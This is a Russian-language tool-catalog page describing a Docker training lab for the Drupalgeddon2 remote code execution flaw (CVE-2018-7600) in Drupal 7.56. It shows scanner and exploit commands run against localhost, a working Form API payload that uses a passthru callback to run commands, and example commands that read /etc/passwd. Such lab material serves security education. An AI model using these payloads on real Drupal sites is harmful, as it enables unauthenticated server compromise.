Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2018-7600-drupalgeddon2-lab — Учебная лаборатория, демонстрирующая удаленное выполнение кода (CVE-2018-7600, Drupalgeddon2) с использованием уязвимой среды Drupal 7.56 на основе Docker. | Kitploit
Инструменты/GitHubGitHub/meraj1312/cve-2018-7600-drupalgeddon2-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
meraj1312/cve-2018-7600-drupalgeddon2-lab

cve-2018-7600-drupalgeddon2-lab

Учебная лаборатория, демонстрирующая удаленное выполнение кода (CVE-2018-7600, Drupalgeddon2) с использованием уязвимой среды Drupal 7.56 на основе Docker.

Репозиторий
114 месяцев назадЕщё не проверено

CVE-2018-7600 Лаборатория уязвимости Drupalgeddon2

Образовательная лаборатория, демонстрирующая эксплуатацию уязвимости CVE-2018-7600 (Drupalgeddon2) с использованием уязвимой среды Drupal 7.56, развёрнутой с помощью Docker.

Этот проект моделирует реальный процесс оценки уязвимостей, включая:

  • Настройка уязвимой среды
  • Обнаружение (сканер)
  • Эксплуатация (RCE)
  • Анализ полезной нагрузки
  • Документация

Обзор уязвимости

CVE-2018-7600 (Drupalgeddon2) — это критическая уязвимость удалённого выполнения кода (RCE) в Drupal CMS.

Проблема заключается в Form API Drupal, где вводимые пользователем данные могут интерпретироваться как render-массивы, что позволяет злоумышленникам внедрять вредоносные обратные вызовы, такие как:

  • passthru
  • system
  • exec

Это приводит к неаутентифицированному выполнению команд на сервере.

Воздействие

  • Удалённое выполнение кода
  • Не требуется аутентификация
  • Полная компрометация сервера

Целевая версия

  • Drupal 7.56 (уязвимая)

Архитектура лаборатории

root@kitploit:~

Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database


Используемые технологии

  • Docker
  • Docker Compose
  • Drupal CMS
  • MySQL
  • Kali Linux
  • Python (Эксплойт и сканер)

Структура репозитория

root@kitploit:~

cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│   └── docker-compose.yml
│
├── screenshots/
│   ├── drupal-dashboard.png
│   ├── drupal-version.png
│   └── rce-output.png
│
├── logs/
│   ├── scan_results.txt
│   └── exploit_log.txt
│
├── payloads/
│   └── payload-list.txt
│
├── report/
│   └── drupalgeddon2-report.pdf


Скриншоты

Панель управления Drupal

Drupal Dashboard

Подтверждение версии

Drupal Version


Быстрый старт

Клонирование репозитория

root@kitploit:~
git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab

Запуск лаборатории

root@kitploit:~
docker compose up -d

Доступ к цели

root@kitploit:~
http://localhost:8080

Обнаружение и эксплуатация

1. Сканирование на уязвимость

root@kitploit:~
python3 scan.py http://localhost:8080

Пример вывода:

root@kitploit:~
[~] Scanning http://localhost:8080... VULNERABLE

2. Эксплойт (RCE)

root@kitploit:~
python3 exploit.py http://localhost:8080 id

Пример вывода:

root@kitploit:~
uid=33(www-data) gid=33(www-data)

Пример полезной нагрузки

Базовая структура полезной нагрузки:

root@kitploit:~
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami

Примеры команд:

root@kitploit:~
whoami
id
cat /etc/passwd

Полный список полезных нагрузок доступен в:

root@kitploit:~
payloads/payload-list.txt

Стратегия документирования

Для поддержания чистой и профессиональной структуры репозитория:

README содержит:

  • Обзор уязвимости
  • Инструкции по настройке лаборатории
  • Примеры базовых полезных нагрузок
  • Как запустить сканер и эксплойт

PDF-отчёт (report/drupalgeddon2-report.pdf) содержит:

  • Подробные шаги эксплуатации
  • Запросы и ответы Burp Suite
  • Результаты тестирования полезной нагрузки
  • Скриншоты выполнения
  • Техническое объяснение уязвимости

Такое разделение обеспечивает:

  • Чистое представление на GitHub
  • Полная техническая документация

Образовательная цель

Эта лаборатория предназначена для:

  • Студентов по кибербезопасности
  • Практики тестирования на проникновение
  • Исследования уязвимостей
  • Обучения разработке эксплойтов

Отказ от ответственности

Этот проект предназначен только для образовательных и исследовательских целей.

Не пытайтесь эксплуатировать системы без явного разрешения.

Авторы не несут ответственности за неправильное использование.

Скачать инструмент